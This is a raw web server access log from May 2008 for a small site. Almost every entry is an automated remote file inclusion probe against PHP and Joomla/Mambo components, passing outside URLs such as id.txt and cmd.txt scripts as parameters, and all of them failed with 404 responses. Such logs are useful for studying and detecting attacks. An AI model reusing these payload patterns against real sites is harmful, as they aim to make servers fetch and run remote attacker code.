69.61.37.254 - - [04/May/2008:19:25:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.61.37.254 - - [04/May/2008:19:25:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:25:13 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:25:13 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:25:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:25:14 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:25:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:25:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:19:25:30 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:19:25:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:19:25:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
59.106.19.213 - - [04/May/2008:19:26:28 -0700] "GET /logs/access_080421.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.106.19.213 - - [04/May/2008:19:26:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.106.19.213 - - [04/May/2008:19:26:29 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:27:05 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:27:05 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:27:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:27:05 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:27:05 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:27:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.19.150.85 - - [04/May/2008:19:27:28 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.19.150.85 - - [04/May/2008:19:27:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.19.150.85 - - [04/May/2008:19:27:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:19:27:42 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:19:27:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:19:27:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.64.33.211 - - [04/May/2008:19:27:46 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.64.33.211 - - [04/May/2008:19:29:10 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:19:29:33 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:19:29:33 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:19:29:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.241.179.137 - - [04/May/2008:19:33:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.utviklingsstudier.org/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:19:38:54 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.61.37.254 - - [04/May/2008:19:39:17 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.61.37.254 - - [04/May/2008:19:39:17 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
195.54.9.218 - - [04/May/2008:19:39:25 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [04/May/2008:19:39:25 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [04/May/2008:19:39:25 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [04/May/2008:19:39:25 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [04/May/2008:19:39:26 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [04/May/2008:19:39:26 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:39:38 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.59.151.227 - - [04/May/2008:19:39:42 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:44:03 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.19.150.85 - - [04/May/2008:19:46:22 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:19:47:27 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:47:49 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:47:50 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:47:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:47:51 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:47:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:47:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:48:36 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.36.179.98 - - [04/May/2008:19:48:55 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:19:54:17 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:06:09 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:06:09 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:06:09 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:07:58 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:07:58 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:07:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.225.229.167 - - [04/May/2008:20:08:14 -0700] "GET /logs/default.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
66.225.229.167 - - [04/May/2008:20:08:15 -0700] "GET /default.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:10:15 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:10:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:10:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:11:17 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:11:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:11:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:12:33 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:12:34 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:12:35 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:12:39 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:12:40 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:12:40 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.62.69 - - [04/May/2008:20:12:53 -0700] "GET /logs/default.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.93.62.69 - - [04/May/2008:20:12:54 -0700] "GET /default.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.22.176 - - [04/May/2008:20:14:22 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
74.6.21.49 - - [04/May/2008:20:14:23 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "mathstamps.com"
85.19.150.85 - - [04/May/2008:20:15:39 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:20:19:33 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:20:19:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:20:19:34 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:23:12 -0700] "GET /logs/access_080317.log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:23:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
189.22.150.131 - - [04/May/2008:20:26:17 -0700] "GET /logs/access_080414.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
189.22.150.131 - - [04/May/2008:20:26:19 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
189.22.150.131 - - [04/May/2008:20:26:22 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:32:14 -0700] "GET /logs/access_080421.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.160.251.134 - - [04/May/2008:20:32:16 -0700] "GET /logs/access_080421.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:20:33:09 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:20:33:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:20:33:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.181.2.242 - - [04/May/2008:20:33:26 -0700] "GET /logs/access_080317.log//nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.181.2.242 - - [04/May/2008:20:33:27 -0700] "GET //nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.181.2.242 - - [04/May/2008:20:33:28 -0700] "GET /logs//nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:33:36 -0700] "GET /logs/access_080331.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:33:36 -0700] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:33:36 -0700] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:20:35:18 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:20:35:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:20:35:19 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [04/May/2008:20:36:18 -0700] "GET /logs/access_080331.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.149.209.100 - - [04/May/2008:20:36:18 -0700] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:36:25 -0700] "GET /logs/access_080317.log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:36:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:36:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.6.123.99 - - [04/May/2008:20:37:18 -0700] "GET /logs/access_080317.log//nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.6.123.99 - - [04/May/2008:20:37:20 -0700] "GET //nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.6.123.99 - - [04/May/2008:20:37:24 -0700] "GET /logs//nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:38:35 -0700] "GET /logs/access_080414.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:38:36 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:38:36 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:38:36 -0700] "GET /logs/access_080414.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:38:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.149.32.24 - - [04/May/2008:20:38:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.225.229.167 - - [04/May/2008:20:38:57 -0700] "GET /logs/access_080414.log/default.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:20:39:43 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:20:39:44 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:20:39:44 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.225.229.167 - - [04/May/2008:20:40:32 -0700] "GET /logs/access_080421.log/default.php?page=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:43:42 -0700] "GET /logs/access_080414.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:43:42 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:43:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
201.12.151.34 - - [04/May/2008:20:44:38 -0700] "GET /logs/access_080317.log//nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [04/May/2008:20:44:48 -0700] "GET //nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
